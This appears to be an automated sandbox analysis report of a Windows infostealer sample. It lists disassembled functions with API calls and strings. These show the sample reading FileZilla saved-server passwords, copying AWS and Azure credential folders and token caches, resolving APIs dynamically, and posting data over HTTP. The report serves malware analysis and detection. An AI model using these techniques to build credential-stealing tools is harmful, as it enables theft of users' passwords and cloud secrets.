                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                • API String ID: 337689325-555421843
                                                                                                • Opcode ID: bb3d1612d92409f956a060fe6b614f4c28f78b7a9e98f3b086c1bf9aff7a9748
                                                                                                • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                                                                                • Opcode Fuzzy Hash: bb3d1612d92409f956a060fe6b614f4c28f78b7a9e98f3b086c1bf9aff7a9748
                                                                                                • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1297 419bb0-419bc4 call 419aa0 1300 419de3-419e42 LoadLibraryA * 5 1297->1300 1301 419bca-419dde call 419ad0 GetProcAddress * 21 1297->1301 1302 419e44-419e58 GetProcAddress 1300->1302 1303 419e5d-419e64 1300->1303 1301->1300 1302->1303 1305 419e96-419e9d 1303->1305 1306 419e66-419e91 GetProcAddress * 2 1303->1306 1308 419eb8-419ebf 1305->1308 1309 419e9f-419eb3 GetProcAddress 1305->1309 1306->1305 1310 419ec1-419ed4 GetProcAddress 1308->1310 1311 419ed9-419ee0 1308->1311 1309->1308 1310->1311 1312 419f11-419f12 1311->1312 1313 419ee2-419f0c GetProcAddress * 2 1311->1313 1313->1312
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CC00), ref: 00419BF1
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CAB0), ref: 00419C0A
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096C918), ref: 00419C22
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CB70), ref: 00419C3A
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CB28), ref: 00419C53
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00967280), ref: 00419C6B
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966930), ref: 00419C83
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966630), ref: 00419C9C
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096C948), ref: 00419CB4
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CBA0), ref: 00419CCC
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CAC8), ref: 00419CE5
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CAE0), ref: 00419CFD
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966950), ref: 00419D15
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CB10), ref: 00419D2E
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096C930), ref: 00419D46
                                                                                                • GetProcAddress.KERNEL32(74DD0000,009665D0), ref: 00419D5E
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CBB8), ref: 00419D77
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096C990), ref: 00419D8F
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966790), ref: 00419DA7
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096CBE8), ref: 00419DC0
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966970), ref: 00419DD8
                                                                                                • LoadLibraryA.KERNEL32(0096C960,?,00416CA0), ref: 00419DEA
                                                                                                • LoadLibraryA.KERNEL32(0096C9A8,?,00416CA0), ref: 00419DFB
                                                                                                • LoadLibraryA.KERNEL32(0096C9D8,?,00416CA0), ref: 00419E0D
                                                                                                • LoadLibraryA.KERNEL32(0096C9F0,?,00416CA0), ref: 00419E1F
                                                                                                • LoadLibraryA.KERNEL32(0096CA08,?,00416CA0), ref: 00419E30
                                                                                                • GetProcAddress.KERNEL32(75A70000,0096CB58), ref: 00419E52
                                                                                                • GetProcAddress.KERNEL32(75290000,0096CA20), ref: 00419E73
                                                                                                • GetProcAddress.KERNEL32(75290000,0096CA38), ref: 00419E8B
                                                                                                • GetProcAddress.KERNEL32(75BD0000,0096CA50), ref: 00419EAD
                                                                                                • GetProcAddress.KERNEL32(75450000,00966850), ref: 00419ECE
                                                                                                • GetProcAddress.KERNEL32(76E90000,00967290), ref: 00419EEF
                                                                                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06
                                                                                                Strings
                                                                                                • NtQueryInformationProcess, xrefs: 00419EFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                • String ID: NtQueryInformationProcess
                                                                                                • API String ID: 2238633743-2781105232
                                                                                                • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                                                                                • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                                                                                • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                                                                                • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1401 405150-40527d call 41aab0 call 404800 call 419030 call 41ade0 lstrlenA call 41ade0 call 419030 call 41aa50 * 5 InternetOpenA StrCmpCA 1424 405286-40528a 1401->1424 1425 40527f 1401->1425 1426 405290-4053a3 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 3 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1424->1426 1427 405914-4059a9 InternetCloseHandle call 418b20 * 2 call 41ad50 * 4 call 41aab0 call 41ab10 * 5 call 401550 call 41ab10 1424->1427 1425->1424 1426->1427 1490 4053a9-4053b7 1426->1490 1491 4053c5 1490->1491 1492 4053b9-4053c3 1490->1492 1493 4053cf-405401 HttpOpenRequestA 1491->1493 1492->1493 1494 405907-40590e InternetCloseHandle 1493->1494 1495 405407-405881 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap HeapAlloc call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA call 418b20 1493->1495 1494->1427 1649 405886-4058b0 InternetReadFile 1495->1649 1650 4058b2-4058b9 1649->1650 1651 4058bb-405901 InternetCloseHandle 1649->1651 1650->1651 1652 4058bd-4058fb call 41acc0 call 41abb0 call 41ab10 1650->1652 1651->1494 1652->1649
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                  • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                  • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004051E3
                                                                                                  • Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
                                                                                                • StrCmpCA.SHLWAPI(?,00976668), ref: 00405275
                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
                                                                                                • HttpOpenRequestA.WININET(00000000,00976678,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004053F4
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,009766B8,00000000,?,0096DF88,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040579B
                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004057B3
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004057C8
                                                                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
                                                                                                • memcpy.MSVCRT(?), ref: 00405806
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405818
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
                                                                                                • memcpy.MSVCRT(?), ref: 00405841
                                                                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00405901
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040590E
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00405918
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                • String ID: ------$"$"$"$--$------$------$------
                                                                                                • API String ID: 2744873387-2774362122
                                                                                                • Opcode ID: 2f870b1aa2c38778c0b2feba81dc8c59410f3a3f9b8e31f0f0ae42b138d9d8d1
                                                                                                • Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
                                                                                                • Opcode Fuzzy Hash: 2f870b1aa2c38778c0b2feba81dc8c59410f3a3f9b8e31f0f0ae42b138d9d8d1
                                                                                                • Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1660 4059b0-405a6b call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 1675 405a74-405a78 1660->1675 1676 405a6d 1660->1676 1677 406013-40603b InternetCloseHandle call 41ade0 call 40a210 1675->1677 1678 405a7e-405bf6 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1675->1678 1676->1675 1687 40607a-4060e5 call 418b20 * 2 call 41aab0 call 41ab10 * 5 call 401550 call 41ab10 1677->1687 1688 40603d-406075 call 41ab30 call 41acc0 call 41abb0 call 41ab10 1677->1688 1678->1677 1762 405bfc-405c0a 1678->1762 1688->1687 1763 405c18 1762->1763 1764 405c0c-405c16 1762->1764 1765 405c22-405c55 HttpOpenRequestA 1763->1765 1764->1765 1766 406006-40600d InternetCloseHandle 1765->1766 1767 405c5b-405f7f call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap HeapAlloc call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA 1765->1767 1766->1677 1876 405f85-405faf InternetReadFile 1767->1876 1877 405fb1-405fb8 1876->1877 1878 405fba-406000 InternetCloseHandle 1876->1878 1877->1878 1879 405fbc-405ffa call 41acc0 call 41abb0 call 41ab10 1877->1879 1878->1766 1879->1876
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                  • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                  • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                                                                                • StrCmpCA.SHLWAPI(?,00976668), ref: 00405A63
                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00976688,00000000,?,0096DF88,00000000,?,00421B4C), ref: 00405EC1
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                                                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                                                                                • memcpy.MSVCRT(?), ref: 00405F4E
                                                                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                                                                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00406000
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                                                                                • HttpOpenRequestA.WININET(00000000,00976678,?,00975EE8,00000000,00000000,00400100,00000000), ref: 00405C48
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00406017
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                • String ID: "$"$------$------$------$S`A$S`A
                                                                                                • API String ID: 1406981993-1449208648
                                                                                                • Opcode ID: 78b8d42d9890a36bb6abe959c91fada7cc87df2669e916b17644556e69dc78b8
                                                                                                • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                                                                                • Opcode Fuzzy Hash: 78b8d42d9890a36bb6abe959c91fada7cc87df2669e916b17644556e69dc78b8
                                                                                                • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00414FD7
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                                                                                • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                  • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                • memset.MSVCRT ref: 00415063
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                                                                                • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                  • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                  • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                • memset.MSVCRT ref: 004150EF
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                                                                                • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                                                                  • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,0096C4E8,?,000003E8), ref: 00414C9A
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                                                                  • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                                                                  • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                                                                  • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                                                                                • memset.MSVCRT ref: 0041517B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                • API String ID: 4017274736-974132213
                                                                                                • Opcode ID: 24077a36fa7f570b9d902fd8354d2c486b68e20ae80709ed5a200977a84efc1f
                                                                                                • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                                                                                • Opcode Fuzzy Hash: 24077a36fa7f570b9d902fd8354d2c486b68e20ae80709ed5a200977a84efc1f
                                                                                                • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
